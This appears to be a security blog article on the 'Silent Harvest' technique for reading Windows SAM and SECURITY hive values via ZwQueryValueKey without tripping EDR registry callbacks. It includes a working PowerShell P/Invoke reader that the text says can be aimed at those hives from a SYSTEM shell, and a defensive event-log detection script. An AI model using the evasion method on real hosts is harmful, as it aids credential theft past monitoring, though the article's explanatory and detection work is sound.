Unnoticed Extraction of Windows Secrets: Stealthy Data Retrieval Techniques Unveiled
Security researcher Sud0Ru has published a technique called "Silent Harvest" that reads Windows secrets straight out of the registry hives that hold them. It is built on internal Windows functions and is designed to sidestep both access controls and the registry-monitoring logic of common Endpoint Detection and Response (EDR) products.
As detailed by Sud0Ru, the technique operates entirely in memory and writes nothing to disk, so there is no saved hive copy or export file for file-based monitoring to catch. At its core is a call to ZwQueryValueKey, the native NT-layer routine exported by ntdll.dll beneath the Win32 RegQueryValueEx family. Microsoft documents it only for kernel-mode drivers, which is why it is usually described as undocumented from user mode.
The Windows component that manages secrets and logon data is the Local Security Authority (LSA), which runs inside the lsass.exe process. The LSA works with two databases that are stored as registry hives: the SAM database (HKLM\SAM, backed by %SystemRoot%\System32\config\SAM) and the Security database, also called the Policy database (HKLM\SECURITY, backed by %SystemRoot%\System32\config\SECURITY). Local account data, including usernames, RIDs and password hashes, is stored in the SAM hive, while LSA secrets such as cached domain logon credentials and the machine account key are stored in the SECURITY hive.
EDR drivers commonly register a registry callback with the kernel (CmRegisterCallbackEx). Whenever a registry operation occurs, the kernel calls that function with two pieces of information: the operation class (for example RegNtPreQueryValueKey or RegNtPostQueryValueKey) and a pointer to an operation-specific structure describing the key and value involved. Silent Harvest does not need to tamper with this mechanism; it simply calls ZwQueryValueKey, which returns the type and data for a requested value name under an open registry key.
The ZwQueryValueKey call, even for highly sensitive values in SAM or SECURITY, triggered no alert on any EDR platform the researcher tested. Two things explain this. First, a pre-operation callback runs before the kernel has done the work: the value's type, length and data are written into the caller's buffer only when the call completes, so a callback that fires at the pre-operation point has no data to inspect. Second, what comes back is not plaintext: values in SAM and SECURITY are stored encrypted under keys derived from the system's boot key, so even a post-operation callback that looks at the result sees opaque bytes, and additional decryption steps are needed before the data becomes usable credential material.
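To make the call path concrete, here is an added example (not code from Sud0Ru's write-up) that invokes the ZwQueryValueKey export of ntdll.dll directly from PowerShell via P/Invoke, bypassing the Win32 RegQueryValueEx layer, and parses the KEY_VALUE_PARTIAL_INFORMATION result. The default target key and value name are my own choice of a benign, world-readable value so the script runs from any user; the same call works on subkeys of \Registry\Machine\SAM and \Registry\Machine\SECURITY when the process holds a token that is allowed to open them (for example a SYSTEM shell).

```powershell
# Added example, not part of the Silent Harvest write-up: call ntdll!ZwQueryValueKey
# directly instead of RegQueryValueEx. NtOpenKey/NtClose and the
# KEY_VALUE_PARTIAL_INFORMATION layout (TitleIndex, Type, DataLength, Data) are the
# standard NT definitions; the target key/value below are assumptions for the demo.
$NtRegSource = @'
using System;
using System.Runtime.InteropServices;

public static class NtReg
{
    [StructLayout(LayoutKind.Sequential)]
    public struct UNICODE_STRING { public ushort Length; public ushort MaximumLength; public IntPtr Buffer; }

    [StructLayout(LayoutKind.Sequential)]
    public struct OBJECT_ATTRIBUTES
    {
        public int Length; public IntPtr RootDirectory; public IntPtr ObjectName;
        public uint Attributes; public IntPtr SecurityDescriptor; public IntPtr SecurityQualityOfService;
    }

    const uint OBJ_CASE_INSENSITIVE = 0x40;
    const uint KEY_QUERY_VALUE = 0x1;
    const int KeyValuePartialInformation = 2;
    const int STATUS_BUFFER_OVERFLOW = unchecked((int)0x80000005);
    const int STATUS_BUFFER_TOO_SMALL = unchecked((int)0xC0000023);

    [DllImport("ntdll.dll")] static extern int NtOpenKey(out IntPtr KeyHandle, uint DesiredAccess, ref OBJECT_ATTRIBUTES ObjectAttributes);
    [DllImport("ntdll.dll")] static extern int ZwQueryValueKey(IntPtr KeyHandle, ref UNICODE_STRING ValueName, int InfoClass, IntPtr Info, int Length, out int ResultLength);
    [DllImport("ntdll.dll")] static extern int NtClose(IntPtr Handle);

    static UNICODE_STRING MakeUnicodeString(string s)
    {
        UNICODE_STRING u = new UNICODE_STRING();
        u.Length = (ushort)(s.Length * 2);
        u.MaximumLength = (ushort)(u.Length + 2);
        u.Buffer = Marshal.StringToHGlobalUni(s);
        return u;
    }

    // Returns the raw value bytes; regType receives the REG_* type (REG_SZ = 1, REG_BINARY = 3, ...).
    public static byte[] QueryValue(string ntKeyPath, string valueName, out int regType)
    {
        UNICODE_STRING keyName = MakeUnicodeString(ntKeyPath);
        UNICODE_STRING valName = MakeUnicodeString(valueName);
        IntPtr keyNamePtr = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(UNICODE_STRING)));
        Marshal.StructureToPtr(keyName, keyNamePtr, false);
        OBJECT_ATTRIBUTES oa = new OBJECT_ATTRIBUTES();
        oa.Length = Marshal.SizeOf(typeof(OBJECT_ATTRIBUTES));
        oa.ObjectName = keyNamePtr;
        oa.Attributes = OBJ_CASE_INSENSITIVE;

        IntPtr hKey = IntPtr.Zero, buf = IntPtr.Zero;
        try
        {
            int status = NtOpenKey(out hKey, KEY_QUERY_VALUE, ref oa);
            if (status != 0) throw new Exception(string.Format("NtOpenKey failed: 0x{0:X8}", status));

            int len = 256, needed;
            buf = Marshal.AllocHGlobal(len);
            status = ZwQueryValueKey(hKey, ref valName, KeyValuePartialInformation, buf, len, out needed);
            if (status == STATUS_BUFFER_OVERFLOW || status == STATUS_BUFFER_TOO_SMALL)
            {
                // Type and DataLength are only known once the call has run: resize and ask again.
                Marshal.FreeHGlobal(buf);
                len = needed;
                buf = Marshal.AllocHGlobal(len);
                status = ZwQueryValueKey(hKey, ref valName, KeyValuePartialInformation, buf, len, out needed);
            }
            if (status != 0) throw new Exception(string.Format("ZwQueryValueKey failed: 0x{0:X8}", status));

            // KEY_VALUE_PARTIAL_INFORMATION: TitleIndex @0, Type @4, DataLength @8, Data @12.
            regType = Marshal.ReadInt32(buf, 4);
            int dataLen = Marshal.ReadInt32(buf, 8);
            byte[] data = new byte[dataLen];
            Marshal.Copy(new IntPtr(buf.ToInt64() + 12), data, 0, dataLen);
            return data;
        }
        finally
        {
            if (hKey != IntPtr.Zero) NtClose(hKey);
            if (buf != IntPtr.Zero) Marshal.FreeHGlobal(buf);
            Marshal.FreeHGlobal(keyNamePtr);
            Marshal.FreeHGlobal(keyName.Buffer);
            Marshal.FreeHGlobal(valName.Buffer);
        }
    }
}
'@
Add-Type -TypeDefinition $NtRegSource

# Benign default target (assumed for the demo); from a SYSTEM shell the same call can be
# pointed at subkeys of '\Registry\Machine\SAM' or '\Registry\Machine\SECURITY'.
$keyPath   = '\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
$valueName = 'ProductName'
$regType   = 0
$bytes = [NtReg]::QueryValue($keyPath, $valueName, [ref]$regType)
"{0}\{1}: type={2}, {3} bytes" -f $keyPath, $valueName, $regType, $bytes.Length
if ($regType -eq 1) { [System.Text.Encoding]::Unicode.GetString($bytes).TrimEnd([char]0) }
else { ($bytes | ForEach-Object { $_.ToString('x2') }) -join '' }
```

Note the two-call pattern: the first ZwQueryValueKey call comes back with STATUS_BUFFER_OVERFLOW or STATUS_BUFFER_TOO_SMALL and the required size, and only the completed call fills in Type and DataLength. That is the point made above about pre-operation callbacks: at the moment a pre-callback fires, the buffer this script is about to parse is still empty.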
The SAM database stores five primary object types: Server, Domain, User, Alias and Group. The Security database manages four: Policy, Trusted Domain, Account and Secret. Overlooked functions often provide simple ways to circumvent defensive assumptions, and Silent Harvest is no exception.
This research demonstrates how to use such internal Windows functions to bypass both access controls and common EDR detection mechanisms with minimal code. It's a stark reminder of the need for continuous security vigilance and the importance of staying abreast of the latest threats and countermeasures.
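Since the blind spot described above lies in the registry-callback path, a practitioner will want telemetry that does not depend on it. Kernel object-access auditing records the handle open (event 4656) and the access (event 4663) at the point of the access check, whichever API performed the query. The following is an added detection check, not part of Sud0Ru's research; it assumes the "Registry" subcategory under Object Access auditing is enabled and that the SAM and SECURITY keys carry a SACL entry that audits read access, and it is run from an elevated shell (reading the Security log needs administrator rights). The 24-hour window and the lsass.exe exclusion are my own choices.

```powershell
# Added detection check, not from the Silent Harvest write-up. Assumes object-access
# auditing for the registry is on, e.g.:
#   auditpol /set /subcategory:"Registry" /success:enable /failure:enable
# and that HKLM\SAM and HKLM\SECURITY carry an audit (SACL) entry for read/query access.
$hivePrefixes = '\REGISTRY\MACHINE\SAM', '\REGISTRY\MACHINE\SECURITY'
$filter = @{ LogName = 'Security'; Id = 4656, 4663; StartTime = (Get-Date).AddHours(-24) }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

$events | ForEach-Object {
    $x = [xml]$_.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    if ($d['ObjectType'] -ne 'Key') { return }            # registry objects only
    $onHive = $false
    foreach ($p in $hivePrefixes) { if ($d['ObjectName'] -like "$p*") { $onHive = $true } }
    if (-not $onHive) { return }
    # lsass.exe owns these hives; any other process touching them deserves a look.
    if ($d['ProcessName'] -like '*\lsass.exe') { return }
    [pscustomobject]@{
        Time       = $_.TimeCreated
        EventId    = $_.Id
        Subject    = '{0}\{1}' -f $d['SubjectDomainName'], $d['SubjectUserName']
        Process    = $d['ProcessName']
        Object     = $d['ObjectName']
        AccessMask = $d['AccessMask']
        Privileges = $d['PrivilegeList']    # present on 4656; shows privilege-based grants
    }
} | Sort-Object Time | Format-Table -AutoSize
```

A non-empty Privileges column on a 4656 event (for example SeBackupPrivilege) tells you the handle was granted by a privilege rather than by the key's DACL, which is worth surfacing on its own. Without the SACL entry the events never fire, so verify that part of the setup before relying on this check.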